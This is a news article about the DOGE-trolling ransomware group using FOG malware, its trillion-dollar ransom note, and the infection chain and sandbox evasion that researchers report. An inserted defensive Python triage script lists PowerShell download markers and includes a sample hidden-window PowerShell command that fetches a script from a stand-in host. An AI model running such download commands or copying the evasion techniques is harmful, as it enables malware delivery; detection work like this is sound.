DOGE-Trolling Ransomware Hackers Demand $1 Trillion In Chilling Attack


Forbes, 25-04-2025
These DOGE ransomware hackers demand a trillion-dollar payment.
Update, April 25, 2025: This story, originally published April 23, has been updated with further details regarding the DOGE ransomware attack and information from a new FBI report about the FOG malware threat used following the latest trillion-dollar ransom note demand.
The same criminal group behind the DOGE Big Balls ransomware attack has just upped the ante. A newly updated ransom note sent to victims is now trolling Elon Musk and DOGE by demanding a ridiculous extortion fee of, and I trust you are sitting down, one trillion dollars from victims. This one has Dr Evil written all over it. Here's everything you need to know about the DOGE ransomware attackers, the FOG malware they have adapted, and the nature of that outrageous ransom note demand.
Although there is no doubt that ransomware threats should be taken very seriously, what with a massive surge in ransomware attacks this year, new password-cracking tools being employed to gain initial access, and some very concerning political moves by big names in the extortion-racket industry, not all the players take themselves as seriously, it would seem. I certainly hope that's the case as far as the DOGE ransomware attackers and the newly updated ransom note left for victims are concerned.
The ransomware group behind the recent DOGE Big Balls threat, using a variant of existing malware known as FOG, and trying to pin responsibility for the attacks on a well-known member of the Department of Government Efficiency team, has just updated its ransom note. The original threat was already bad enough, using a ZIP file with a deceptive shortcut to execute a multi-stage PowerShell infection chain exploiting a known Windows vulnerability, CVE-2015-2291, to gain kernel-level access and privilege escalation. The attack also, it has to be said, employed the political commentary and conspiracy theory tactic within the ransomware scripts and code. These included such things as 'The CIA didn't kill Kennedy you idiot. Oswald is a very deranged person that felt ostracized by his own country.'
Now, as detailed in an April 21 security report by researchers Nathaniel Morales and Sarah Pearl Camiling at Trend Micro, the ransomware appears to have started trolling DOGE and Elon Musk mercilessly. In reference to the now-infamous Musk demand for federal workers to email DOGE what they had achieved, leaving them fearing for their jobs if they did not comply, the ransom note has been altered to read:
'Give me five bullet points on what you accomplished for work last week or you owe me a TRILLION dollars.'
In an April 23 FBI internet crime report, B. Chad Yarbrough, the FBI operations director for criminal and cyber, confirmed that ransomware is 'the most pervasive threat to critical infrastructure' and played an increasingly important role in the $16.6 billion cost of cybercrime to individuals and organizations in the U.S. across 2024. Interestingly, the FBI report said that the FOG ransomware threat, a variant of which has been used in the DOGE Big Balls attacks, was the most reported of new ransomware attacks during 2024. The bureau's Internet Crime Complaint Center provides this information to field offices to help the FBI 'identify new ransomware variants, discover the enterprises the threat actors are targeting, and determine whether critical infrastructure is being targeted,' the FBI said.
'The most alarming thing about the FBI's IC3 report is that its numbers are just the tip of the formidable iceberg of organized cybercrime,' Dr Ilia Kolochenko, CEO at ImmuniWeb, said. Warning that a 'growing number' of U.S. organizations prefer to silently settle with ransomware groups that carry a strong reputation for keeping attacks and data confidential following payment, Kolochenko said that it's likely we will see this option continue to be taken. 'In all cases,' Kolochenko advised, 'the final decision to pay or not to pay should be brainstormed with cybercrime experts and lawyers having experience in such matters. Otherwise, you are running a sprint on thin ice.' In the case of the DOGE attacks, maybe less consideration is required when the demand is for a trillion dollars.
'The ransomware payload embedded in the samples has been verified as FOG ransomware,' the Trend Micro report warned, 'an active ransomware family targeting both individuals and organizations.'
'FOG ransomware is a relatively new ransomware family that enterprises must add to their watchlist,' Trend Micro said, adding that 'the impact of a successful ransomware attack could still potentially cost enterprises financial loss and operational disruption,' regardless of the DOGE references and the trolling nature of the ransom note itself.
The security researchers noted that the FOG ransomware itself has compromised some 100 victims in the first three months of the year, before the DOGE-trolling started, it would seem. In January, there were 18 victims, 53 in February and 29 in March.
Trend Micro said that the de-obfuscated script in the ransom note executed a PowerShell command which performs a multi-stage operation: retrieving a ransomware loader (cwiper.exe), ktool.exe and other PowerShell scripts. 'It also opens politically themed YouTube videos and includes written political commentary directly in the script,' the report stated, which adds to the trolling element of the attack.
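As an added example (not from the article or the Trend Micro report), the following Python triages process-creation events for the chain described above: PowerShell performing a download, followed by the named files cwiper.exe and ktool.exe. The event field names, the download markers and the sample events are constructed assumptions.

```python
import ntpath

# File names the article says the de-obfuscated script retrieves.
# Names alone are weak indicators (trivially renamed); parentage adds context.
PAYLOAD_NAMES = {"cwiper.exe", "ktool.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Generic download / encoded-command markers: an assumption, not from the report.
DOWNLOAD_MARKERS = ("invoke-webrequest", "downloadstring", "downloadfile",
                    "start-bitstransfer", "-encodedcommand", " -enc ")


def base(path):
    """Lower-cased file name of a Windows path ('' if missing)."""
    return ntpath.basename(path or "").lower()


def score_event(ev):
    """Return finding tags for one process-creation event (dict)."""
    findings = []
    image, parent = base(ev.get("Image")), base(ev.get("ParentImage"))
    cmd = (ev.get("CommandLine") or "").lower()
    if image in POWERSHELL and any(m in cmd for m in DOWNLOAD_MARKERS):
        findings.append("powershell_download")
        if parent == "explorer.exe":
            # Consistent with a user clicking a shortcut, as in the ZIP lure.
            findings.append("user_launched_powershell")
    if image in PAYLOAD_NAMES:
        findings.append("named_payload")
        if parent in POWERSHELL:
            findings.append("payload_spawned_by_powershell")
    return findings


def triage(events):
    """Return {host: sorted findings} for hosts with at least one finding."""
    hosts = {}
    for ev in events:
        tags = score_event(ev)
        if tags:
            hosts.setdefault(ev["Host"], set()).update(tags)
    return {h: sorted(t) for h, t in hosts.items()}


# Constructed sample events (simplified, Sysmon-like field names).
SAMPLE_EVENTS = [
    {"Host": "WS-01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -w hidden -c Invoke-WebRequest https://example.invalid/stage1.ps1 -OutFile C:\Users\Public\s.ps1"},
    {"Host": "WS-01", "Image": r"C:\Users\Public\cwiper.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"C:\Users\Public\cwiper.exe"},
    {"Host": "WS-02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"Host": "WS-03", "Image": r"C:\Tools\KTOOL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"C:\Tools\KTOOL.EXE"},
]

if __name__ == "__main__":
    for host, tags in triage(SAMPLE_EVENTS).items():
        print(host, tags)
```

A host that shows both the PowerShell download and a PowerShell-spawned payload, like WS-01 in the sample, deserves priority over a bare file-name match such as WS-03.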
FOG also takes your security very seriously, at least as far as stopping defenders from analyzing the malware is concerned. 'We have observed that prior to dropping its payload,' the security researchers confirmed, 'the malware investigated checks various indicators, such as processor count, RAM, MAC address, registry, and tick count, to detect a sandbox.' If any of these security checks should fail, then FOG will exit the entire process.
As such, it's imperative that you do not think that just because the attackers might act like clowns, the threat itself isn't serious.
Indeed, the ransomware demand itself is all business. 'We are the ones who encrypted your data and also copied some of it to our internal resource,' the attackers state. They then advise the victim that the sooner they are contacted, the sooner they can get everything resolved, offering instructions on using a Tor browser to get the next steps.
The DOGE references are not the only trolling in the updated ransom note; there's also a 'Don't snitch now' warning. This could be in response to the ransomware informer platform that I have previously reported on. The humor — I guess that's what it is an attempt at — continues with a warning from the attackers that they have 'grabbed your trilatitude and trilongitude (the most accurate) coordinates of where you live,' in order to prove that they are lying. Not lying and not funny, but not to be ignored either.